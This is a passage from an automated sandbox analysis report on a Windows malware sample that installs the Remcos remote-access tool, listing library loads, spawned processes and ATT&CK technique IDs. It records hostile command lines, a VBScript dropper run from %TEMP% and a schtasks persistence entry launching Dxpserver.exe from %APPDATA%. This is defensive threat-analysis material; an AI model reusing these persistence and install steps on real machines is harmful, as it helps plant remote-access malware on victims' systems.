ADVAPI32.dll (UID: 00000000-00005116)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005116)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005116)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005116)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00005116)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00005116)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005116)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00005116)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00005116)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005116)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00005116)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005492)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005492)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter MSISIP.DLL (UID: 00000000-00005492)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005492)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\CRYPT32.dll (UID: 00000000-00005492)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter imm32.dll (UID: 00000000-00005492)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\wshext.dll (UID: 00000000-00005492)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ole32.dll (UID: 00000000-00005492)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\MSCTF.dll (UID: 00000000-00005492)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003312)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003312)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003312)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003312)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003312)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003312)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003312)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00003312)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00003312)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00003312)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00003312)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00003312)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003312)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00003312)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00003312)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00003312)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00003312)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005532)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005532)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005532)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005532)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005532)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005532)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\advapi32.dll (UID: 00000000-00005532)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter WINTRUST.dll (UID: 00000000-00005532)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00005532)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005532)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005532)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter MSISIP.DLL (UID: 00000000-00005532)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\CRYPT32.dll (UID: 00000000-00005532)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter imm32.dll (UID: 00000000-00005532)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\wshext.dll (UID: 00000000-00005532)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ole32.dll (UID: 00000000-00005532)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\MSCTF.dll (UID: 00000000-00005532)\n \"schtasks.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00005720)\n \"schtasks.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005352)\n \"schtasks.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005352)\n \"schtasks.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005352)\n \"schtasks.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005352)\n \"schtasks.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00005352)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter UxTheme.dll (UID: 00000000-00005804)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter IMM32.dll (UID: 00000000-00005804)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter comctl32 (UID: 00000000-00005804)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005804)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter Advapi32.dll (UID: 00000000-00005804)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00005804)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005804)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005804)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005804)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005804)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00005804)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter Kernel32.dll (UID: 00000000-00005804)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005804)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005804)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005804)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005804)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005804)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00005804)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00005804)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00005804)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\sfc.dll (UID: 00000000-00005804)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004900)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004900)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004900)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004900)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter User32.dll (UID: 00000000-00004900)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004900)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter Psapi.dll (UID: 00000000-00004900)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005644)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter Advapi32.dll (UID: 00000000-00005644)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00005644)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005644)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005644)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005644)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005644)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00005644)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter Kernel32.dll (UID: 00000000-00005644)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005644)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005644)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005644)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005644)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005644)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00005644)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00005644)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00005644)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\sfc.dll (UID: 00000000-00005644)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005640)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005640)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005640)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005640)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005640)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005640)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005640)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00005640)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00005640)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005640)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00005640)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00005640)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00005640)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00005888)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005888)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005888)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter MSISIP.DLL (UID: 00000000-00005888)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005888)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\CRYPT32.dll (UID: 00000000-00005888)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter imm32.dll (UID: 00000000-00005888)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\wshext.dll (UID: 00000000-00005888)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ole32.dll (UID: 00000000-00005888)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\MSCTF.dll (UID: 00000000-00005888)\n \"schtasks.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005920)\n \"schtasks.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005920)\n \"schtasks.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005920)\n \"schtasks.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005920)\n \"schtasks.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00005920)\n \"schtasks.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006032)\n \"schtasks.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006032)\n \"schtasks.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006032)\n \"schtasks.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006032)\n \"schtasks.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\System32\\schtasks.exe (UID: 00000000-00006032)\n \"schtasks.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00006032)\n \"schtasks.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00006032)\n \"schtasks.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00006032)\n \"schtasks.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005860)\n \"schtasks.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005860)\n \"schtasks.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005860)\n \"schtasks.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005860)\n \"schtasks.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00005860)\n \"schtasks.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00005860)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"schtasks.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"schtasks.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"Dxpserver.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"Dxpserver.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"WScript.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"WScript.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"remcos.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"remcos.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03\" has an executable section named \".text\"\n \"remcos.exe.bin\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03\" has an writable section named \".data\"\n \"remcos.exe.bin\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"remcos.exe.bin\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75530000\n \"WScript.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75530000\n \"schtasks.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75530000\n \"Dxpserver.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75530000\n \"remcos.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75530000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"WScript.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"WScript.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"WScript.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (UID: 00000000-00003032)\n Spawned process \"WScript.exe\" with commandline \"\"%TEMP%\\\\install.vbs\"\" (UID: 00000000-00003092)\n Spawned process \"schtasks.exe\" with commandline \"/create /tn cttunesvr /tr \"%APPDATA%\\\\adprovider\\\\Dxpserver.exe\" ...\" (UID: 00000000-00002908)\n Spawned process \"Dxpserver.exe\" (UID: 00000000-00001212)\n Spawned process \"Dxpserver.exe\" (UID: 00000000-00005216)\n Spawned process \"Dxpserver.exe\" (UID: 00000000-00005116)\n Spawned process \"WScript.exe\" with commandline \"\"%TEMP%\\\\install.vbs\"\" (UID: 00000000-00005492)\n Spawned process \"Dxpserver.exe\" (UID: 00000000-00003312)\n Spawned process \"WScript.exe\" with commandline \"\"%TEMP%\\\\install.vbs\"\" (UID: 00000000-00005532)\n Spawned process \"schtasks.exe\" with commandline \"/create /tn cttunesvr /tr \"%APPDATA%\\\\adprovider\\\\Dxpserver.exe\" ...\" (UID: 00000000-00005720)\n Spawned process \"schtasks.exe\" with commandline \"/create /tn cttunesvr /tr \"%APPDATA%\\\\adprovider\\\\Dxpserver.exe\" ...\" (UID: 00000000-00005352)\n Spawned process \"remcos.exe\" (UID: 00000000-00005804)\n Spawned process \"remcos.exe\" (UID: 00000000-00004900)\n Spawned process \"iexplore.exe\" (UID: 00000000-00002176)\n Spawned process \"iexplore.exe\" (UID: 00000000-00005868)\n Spawned process \"Dxpserver.exe\" (UID: 00000000-00005644)\n Spawned process \"Dxpserver.exe\" (UID: 00000000-00005640)\n Spawned process \"WScript.exe\" with commandline \"\"%TEMP%\\\\install.vbs\"\" (UID: 00000000-00005888)\n Spawned process \"schtasks.exe\" with commandline \"/create /tn cttunesvr /tr \"%APPDATA%\\\\adprovider\\\\Dxpserver.exe\" ...\" (UID: 00000000-00005920)\n Spawned process \"schtasks.exe\" with commandline \"/create /tn cttunesvr /tr \"%APPDATA%\\\\adprovider\\\\Dxpserver.exe\" ...\" (UID: 00000000-00006032)\n Spawned process \"schtasks.exe\" with commandline \"/create /tn cttunesvr /tr \"%APPDATA%\\\\adprovider\\\\Dxpserver.exe\" ...\" (UID: 00000000-00005860)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (UID: 00000000-00003032)\n Spawned process \"WScript.exe\" with commandline \"\"%TEMP%\\\\install.vbs\"\" (UID: 00000000-00003092)\n Spawned process \"schtasks.exe\" with commandline \"/create /tn cttunesvr /tr \"%APPDATA%\\\\adprovider\\\\Dxpserver.exe\" ...\" (UID: 00000000-00002908)\n Spawned process \"Dxpserver.exe\" (UID: 00000000-00001212)\n Spawned process \"Dxpserver.exe\" (UID: 00000000-00005216)\n Spawned process \"Dxpserver.exe\" (UID: 00000000-00005116)\n Spawned process \"WScript.exe\" with commandline \"\"%TEMP%\\\\install.vbs\"\" (UID: 00000000-00005492)\n Spawned process \"Dxpserver.exe\" (UID: 00000000-00003312)\n Spawned process \"WScript.exe\" with commandline \"\"%TEMP%\\\\install.vbs\"\" (UID: 00000000-00005532)\n Spawned process \"schtasks.exe\" with commandline \"/create /tn cttunesvr /tr \"%APPDATA%\\\\adprovider\\\\Dxpserver.exe\" ...\" (UID: 00000000-00005720)\n Spawned process \"schtasks.exe\" with commandline \"/create /tn cttunesvr /tr \"%APPDATA%\\\\adprovider\\\\Dxpserver.exe\" ...\" (UID: 00000000-00005352)\n Spawned process \"remcos.exe\" (UID: 00000000-00005804)\n Spawned process \"remcos.exe\" (UID: 00000000-00004900)\n Spawned process \"iexplore.exe\" (UID: 00000000-00002176)\n Spawned process \"iexplore.exe\" (UID: 00000000-00005868)\n Spawned process \"Dxpserver.exe\" (UID: 00000000-00005644)\n Spawned process \"Dxpserver.exe\" (UID: 00000000-00005640)\n Spawned process \"WScript.exe\" with commandline \"\"%TEMP%\\\\install.vbs\"\" (UID: 00000000-00005888)\n Spawned process \"schtasks.exe\" with commandline \"/create /tn cttunesvr /tr \"%APPDATA%\\\\adprovider\\\\Dxpserver.exe\" ...\" (UID: 00000000-00005920)\n Spawned process \"schtasks.exe\" with commandline \"/create /tn cttunesvr /tr \"%APPDATA%\\\\adprovider\\\\Dxpserver.exe\" ...\" (UID: 00000000-00006032)\n Spawned process \"schtasks.exe\" with commandline \"/create /tn cttunesvr /tr \"%APPDATA%\\\\adprovider\\\\Dxpserver.exe\" ...\" (UID: 00000000-00005860)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"Dxpserver.exe\" (UID: 00000000-00001212) was launched with new environment variables: \"PROMPT=\"$P$G\"\"\n Process \"Dxpserver.exe\" (UID: 00000000-00001212) was launched with modified environment variables: \"PSModulePath, PATHEXT\"\n Process \"Dxpserver.exe\" (UID: 00000000-00005216) was launched with modified environment variables: \"PSModulePath, PATHEXT\"\n Process \"Dxpserver.exe\" (UID: 00000000-00005216) was launched with missing environment variables: \"PROMPT\"\n Process \"Dxpserver.exe\" (UID: 00000000-00005116) was launched with new environment variables: \"PROMPT=\"$P$G\"\"\n Process \"Dxpserver.exe\" (UID: 00000000-00005116) was launched with modified environment variables: \"PSModulePath, PATHEXT\"\n Process \"Dxpserver.exe\" (UID: 00000000-00003312) was launched with modified environment variables: \"PSModulePath, PATHEXT\"\n Process \"Dxpserver.exe\" (UID: 00000000-00003312) was launched with missing environment variables: \"PROMPT\"\n Process \"schtasks.exe\" (UID: 00000000-00005720) was launched with new environment variables: \"PROMPT=\"$P$G\"\"\n Process \"schtasks.exe\" (UID: 00000000-00005720) was launched with modified environment variables: \"PSModulePath, PATHEXT\"\n Process \"schtasks.exe\" (UID: 00000000-00005352) was launched with modified environment variables: \"PSModulePath, PATHEXT\"\n Process \"schtasks.exe\" (UID: 00000000-00005352) was launched with missing environment variables: \"PROMPT\"\n Process \"remcos.exe\" (UID: 00000000-00005804) was launched with new environment variables: \"PROMPT=\"$P$G\"\"\n Process \"remcos.exe\" (UID: 00000000-00005804) was launched with modified environment variables: \"PSModulePath, PATHEXT\"\n Process \"Dxpserver.exe\" (UID: 00000000-00005644) was launched with modified environment variables: \"PSModulePath, PATHEXT\"\n Process \"Dxpserver.exe\" (UID: 00000000-00005644) was launched with missing environment variables: \"PROMPT\"\n Process \"schtasks.exe\" (UID: 00000000-00005920) was launched with new environment variables: \"PROMPT=\"$P$G\"\"\n Process \"schtasks.exe\" (UID: 00000000-00005920) was launched with modified environment variables: \"PSModulePath, PATHEXT\"\n Process \"schtasks.exe\" (UID: 00000000-00005860) was launched with modified environment variables: \"PSModulePath, PATHEXT\"\n Process \"schtasks.exe\" (UID: 00000000-00005860) was launched with missing environment variables: \"PROMPT\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03\" was detected as \"AutoIt\" and name: \"Library\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"remcos.exe.bin\" was detected as \"AutoIt\" and name: \"Library\"\n \"remcos.exe.bin\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"remcos.exe.bin\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"remcos.exe.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": 